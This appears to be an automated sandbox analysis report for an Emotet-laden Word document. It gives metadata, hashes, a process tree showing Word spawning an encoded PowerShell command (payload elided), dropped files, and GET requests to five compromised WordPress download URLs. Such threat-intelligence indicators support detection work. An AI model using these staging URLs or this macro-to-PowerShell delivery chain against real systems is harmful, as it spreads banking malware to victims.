File name: | Documents_10142019HQ-01731.doc |
---|---|
Full analysis: | https://app.any.run/tasks/f2b2b5b7-0277-46d6-a4b6-3a6a6497b844 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | October 14, 2019, 17:59:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Lake, Subject: payment, Author: Ari Jerde, Keywords: deposit, Comments: Licensed Rubber Tuna, Template: Normal.dotm, Last Saved By: Nels Cartwright, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 15:00:00 2019, Last Saved Time/Date: Mon Oct 14 15:00:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0 |
MD5: | E064623AEA3DD4001CEDE0ED8BCCB05B |
SHA1: | 97CDEC182D207D628FD1D40F818D2E327CBE5AB4 |
SHA256: | FEF332A512D0C08388093254E894647CC0467180CCFED2F62D48935141203FB3 |
SSDEEP: | 3072:3PHuhoQKgdzSrGsKyIwLx38oRaWOcIBOaOhi1o5lE8COrg12bKDmwf9EJZ:3PHuhoQKUzSHnLx38oAWOJQaOhi1wKP |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Lake |
---|---|
Subject: | payment |
Author: | Ari Jerde |
Keywords: | deposit |
Comments: | Licensed Rubber Tuna |
Template: | Normal.dotm |
LastModifiedBy: | Nels Cartwright |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:10:14 14:00:00 |
ModifyDate: | 2019:10:14 14:00:00 |
Pages: | 1 |
Words: | 30 |
Characters: | 172 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Konopelski - Fisher |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 201 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
Manager: | Grady |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2140 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Documents_10142019HQ-01731.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin, Company: Microsoft Corporation, Integrity Level: MEDIUM, Description: Microsoft Word, Version: 14.0.6024.1000 | | | | |
3036 | powershell -e [encoded command elided] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin, Company: Microsoft Corporation, Integrity Level: MEDIUM, Description: Windows PowerShell, Exit code: 0, Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |
PID | Process | Filename | Type | |
---|---|---|---|---|
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA7E3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3036 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4LBT6NS7LGYQ1CQD0GU2.temp | — | |
MD5:— | SHA256:— | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:57C065C449D8BDBE8737E8BAAC4E9580 | SHA256:338318F0365ED3E71A63797DE1E923710D5CA3EA4623141F225DEB0646C962DC | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:4C3134C44E28BF6C6BC5E6F965C0C7FA | SHA256:9C801779D351F4BCE393BD7693536721F69232964EFCFAEE03C56988F569545E | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DAB3F4D.wmf | wmf | |
MD5:7A371A004F39EF9520E0558BEFC2AE2F | SHA256:21987E3154FDA05A9B509A38A3930B42DEF2FDD873A22DC04C1B8F58C152FF90 | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:165AF72BFD1EBC719F89F7255DAA3EBD | SHA256:B4895FD3AE0107CB4DAD788EA31883F6A82DFAAFF40BAC17F5E2165CD5FEFA47 | |||
2140 | WINWORD.EXE | C:\Users\admin\Desktop\~$cuments_10142019HQ-01731.doc | pgc | |
MD5:F7D9BD49019575769DE0A8038C9C2D29 | SHA256:45BB2C86D670E5FE669165379FC90E1DB3D66ADCF34292F169549BC9F75835CA | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74BDDBE3.wmf | wmf | |
MD5:CAB46972BA286DD4183364416F86579C | SHA256:DF78026D382D8648CA4FDD93B5F04FE7F7FEF2878110617D617C87010F9245C0 | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\371B2B82.wmf | wmf | |
MD5:B6DB85839A05A75B7E46D596AC315745 | SHA256:C91348F15A0130FC4ED8489CBE948FF306AB454AD65E097C5F1E35BC43F53954 | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DF69019B.wmf | wmf | |
MD5:16D2B6692B051A88E18B72C4C6396772 | SHA256:0C9C7997B43810A320033116A07DCFD58DE553FFD647DF2BD089C5FAD69FAD2B | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3036 | powershell.exe | GET | 404 | 62.210.16.61:80 | http://pcf08.com/wp-content/02447/ | FR | xml | 345 b | malicious |
3036 | powershell.exe | GET | 404 | 149.210.131.83:80 | http://beansmedia.com/zeus16/wp-includes/tubaw5y35/ | NL | xml | 345 b | suspicious |
3036 | powershell.exe | GET | 404 | 173.236.169.124:80 | http://abhidhammasociety.com/wp-snapshots/ih3vzdc9/ | US | xml | 345 b | unknown |
3036 | powershell.exe | GET | 404 | 199.204.248.102:80 | http://andrewsiceloff.com/wp-admin/cj2d0009/ | US | xml | 345 b | suspicious |
3036 | powershell.exe | GET | 404 | 166.62.28.141:80 | http://acquiring-talent.com/dpaj/05gd575/ | US | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3036 | powershell.exe | 173.236.169.124:80 | abhidhammasociety.com | New Dream Network, LLC | US | unknown |
3036 | powershell.exe | 166.62.28.141:80 | acquiring-talent.com | GoDaddy.com, LLC | US | malicious |
3036 | powershell.exe | 149.210.131.83:80 | beansmedia.com | Transip B.V. | NL | suspicious |
3036 | powershell.exe | 199.204.248.102:80 | andrewsiceloff.com | CONTINENTAL BROADBAND PENNSYLVANIA, INC. | US | suspicious |
3036 | powershell.exe | 62.210.16.61:80 | pcf08.com | Online S.a.s. | FR | malicious |
Domain | IP | Reputation |
---|---|---|
andrewsiceloff.com | | suspicious |
beansmedia.com | | suspicious |
abhidhammasociety.com | | unknown |
pcf08.com | | malicious |
acquiring-talent.com | | malicious |